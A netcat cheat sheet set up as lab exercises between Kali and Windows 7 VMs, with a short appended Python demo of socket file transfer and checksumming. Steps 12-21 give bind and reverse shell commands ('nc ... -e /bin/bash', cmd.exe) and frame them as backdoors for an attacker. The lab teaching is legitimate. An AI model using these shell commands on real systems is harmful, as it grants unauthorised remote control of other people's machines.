Cheat Sheet : NetCat

Netcat is known by most hackers as the Swiss army knife of hacking. It's a great tool for setting up backdoors or just plain and simple TCP or UDP connections. Here are a few examples of how you can use netcat:

Let's do some exercises with it in Kali Linux. Our VMs today are a Kali Linux box and a Windows 7 box. First start by looking at the help output: nc -h

1. Let's check to see whether a port is listening (first start the apache2 service). Type: nc -v localhost 80 (nc needs both a host and a port)

2. If you started the apache2 service on Kali Linux, you should see port 80 reported as open

3. You can also set up a listener port. Type: nc -lvp 1234

4. The -l here is for listen, the -v is for verbose, and the -p specifies the port to listen on

5. Let's open up a second terminal window and use netcat to connect to the listener

6. In the second terminal type: nc 10.0.0.100 1234 and hit enter 

7. The first terminal should show you connected 

8. Now let's chat from the second terminal by typing: sup and hit enter

9. The word “sup” should show on the first terminal 

10. In the first terminal do the same and it should show up on the second terminal 

11. Ctrl-C (by the way, you could demo this with Metasploitable2 and Kali as well)

12. Now let's say we want our listener (victim) to give the second terminal (attacker) a bash shell when they connect

13. On the first terminal type: nc -lvp 1234 -e /bin/bash (the -e flag hands the connection to the given executable; it only exists in netcat builds compiled with that option, such as nc.traditional, not in the OpenBSD netcat)

14. In the second terminal type: nc 10.0.0.100 1234 and hit enter 

15. It won't show anything, but give it a second (you may have to hit enter on the first terminal to get it to register that it connected). Then, in the second terminal window, type whoami and it should show root

16. Type in “id” and you should see the uid, gid and groups all showing root (0) 

17. Ctrl-c 

18. In addition to giving a shell from the listener you can also push a shell back to the listener 

19. On the first terminal type: nc -lvp 1234 

20. On the second terminal type: nc 10.0.0.100 1234 -e /bin/bash (if doing this from Windows 7, replace /bin/bash with cmd.exe)

21. Back on your first terminal type in whoami and you should see root 

22. Ctrl-c 

23. Now let's send a file using netcat

24. In the first terminal type: nc -lvp 1234 > netcatfile (this creates an empty file on the listener and writes whatever the attacker sends into it)

25. In the second terminal type: nc 10.0.0.100 1234 < raystest (raystest is the file from the previous exercises)

26. Ctrl-C, and now in the first terminal type: cat netcatfile. It should contain the same text as raystest (1 warrior favorite, etc.)
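As an added illustration (not from the original post), here is what the listener/sender pair in steps 24-26 does at the socket level, run on loopback in Python, with a checksum afterwards since netcat itself verifies nothing. SAMPLE_FILE is a constructed stand-in for raystest, and the port is chosen by the OS instead of 1234.

```python
import hashlib
import socket
import threading

# Constructed stand-in for the page's "raystest" file (not the real file).
SAMPLE_FILE = b"1 warrior favorite\n2 mage\n3 rogue\n"


def receive_one(srv):
    """Listener side of `nc -lvp PORT > netcatfile`: accept one client and
    collect everything it sends until it disconnects (netcat has no
    end-of-file marker, which is why the page has you Ctrl-C afterwards)."""
    conn, _ = srv.accept()
    chunks = []
    with conn:
        while True:
            data = conn.recv(4096)
            if not data:          # empty read == peer closed its side
                break
            chunks.append(data)
    return b"".join(chunks)


def send_file(port, payload):
    """Client side of `nc HOST PORT < raystest`: connect, stream the bytes,
    then shut down the write side so the listener sees EOF."""
    with socket.create_connection(("127.0.0.1", port)) as conn:
        conn.sendall(payload)
        conn.shutdown(socket.SHUT_WR)


def transfer(payload):
    """Run both ends on loopback and return what the listener would have written."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))    # port 0: let the OS pick (the page uses 1234)
    srv.listen(1)
    port = srv.getsockname()[1]
    got = {}
    worker = threading.Thread(target=lambda: got.update(data=receive_one(srv)))
    worker.start()
    send_file(port, payload)
    worker.join(timeout=5)
    srv.close()
    return got.get("data", b"")


def sha256(data):
    """netcat offers no integrity check, so compare digests on both ends."""
    return hashlib.sha256(data).hexdigest()
```

Compare sha256(received) with sha256 of the original on the sending side; a mismatch means the transfer was cut short, which is easy to do when the Ctrl-C comes too early.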
